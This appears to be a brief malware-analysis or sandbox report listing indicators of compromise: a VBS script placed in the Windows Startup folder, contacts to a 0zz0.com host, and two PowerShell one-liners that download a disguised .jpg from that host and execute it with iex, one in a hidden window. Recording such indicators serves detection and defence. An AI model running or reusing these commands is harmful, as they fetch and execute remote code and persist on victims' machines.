Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\ dddd.vbs
- 'ww##.0zz0.com':443
- DNS ASK ww##.0zz0.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://www7.0zz0.com/2020/06/18/09/693419795.jpg')' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://www7.0zz0.com/2020/06/18/09/693419795.jpg')